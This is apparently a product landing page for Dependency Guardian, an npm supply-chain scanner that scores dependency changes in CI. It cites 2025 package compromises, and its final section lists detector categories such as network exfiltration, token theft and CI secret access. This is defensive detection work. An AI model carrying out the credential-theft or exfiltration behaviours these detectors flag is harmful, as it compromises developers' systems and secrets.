Dependency Guardian — 26 Behavioral Detectors for npm Supply Chain Security

Behavioral Supply Chain Intelligence

See what every dependency actually does before it ships

Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report — flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.

No credit card required. Free forever.

2.6B Weekly downloads affected in the Chalk / Debug compromise.

500+ Packages infected by the Shai-Hulud npm worm.

23K Repositories impacted in the tj-actions supply chain incident.

Why You Need an Intake Gate

In 2025, these unreviewed dependency updates hit production.

None had a CVE. No intake process caught them. They merged through standard PR workflows.

2.6B chalk + debug hijack Weekly downloads compromised

500+ Shai-Hulud worm Packages infected in 24 hours

2,349 S1ngularity campaign Credentials stolen via install scripts

23K tj-actions breach Repos exposed, led to Coinbase breach

Without intake control

Dependencies merge unreviewed
CVE tools miss zero-day attacks
No policy enforcement on upgrades
No audit trail for compliance

With Dependency Guardian

Every upgrade gets a verdict before merge
Behavioral analysis catches new attacks
Configurable pass/warn/block thresholds
Full scan history and audit trail

Policy enforcement

Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.

Approval workflow

Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.

5-minute CI setup

One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.

Compliance-ready audit trail

Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.

Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1): See benchmarks →

How it works

From dependency change to approved merge in four steps.

Step 01

Pull Request

A developer opens a PR that adds or updates npm packages in your lockfile.

package-lock.json

Step 02

Scan for Attacks

26 behavioral detectors analyze every file in each package for malicious code patterns.

26 detectors

Step 03

Pass / Warn / Block

A risk score determines the verdict — safe to merge, review needed, or blocked outright.

risk score

Step 04

Ship Safe

Merge with confidence knowing every dependency change was analyzed before reaching main.

merge ready

❯_ GITHUB ACTIONS

PR #247 bump lodash 4.17.20 → 4.17.21 → Scanning 3 changed packages... → Running 26 detectors across 847 files → PASS — safe to merge

❯_ CLI

$ dg scan Discovering package changes... Scanning 3 packages (git-diff)... Dependency Guardian Score: 0 PASS 3 packages scanned, 0 flagged

In your pull request

Every dependency change gets a verdict posted directly in the PR. Review, approve, or block before merge.

Clean Dependency Guardian clean verdict — no suspicious changes detected

Flagged — Warn Dependency Guardian warn verdict — 1 flagged package with score 100

Flagged — Block Dependency Guardian block verdict — 1 blocked package with score 100

Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.

Built for dependency governance

Six capabilities that turn dependency updates into a controlled process.

CI enforcement on every PR

Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.

Configurable policy engine

Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.

Pass / Warn / Block verdicts

Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.

Audit trail and scan history

Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.

Behavioral analysis engine

26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.

Your source code stays private

Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.

What powers the verdicts

26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.

Install Scripts Child Process Network Exfiltration Obfuscation Diff Risk Fresh Publish Maintainer Change Sensitive Paths Binary Addons Filesystem Persistence CI Secret Access Suspicious API GitHub Reputation Source Mismatch Purpose Mismatch Typosquat Root Scripts Behavior Drift Token Theft Worm Behavior Preinstall Timing Legitimate API Exfil Bun Runtime Evasion Dependency Confusion Browser Phishing Empty Package

Works everywhere you build

GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.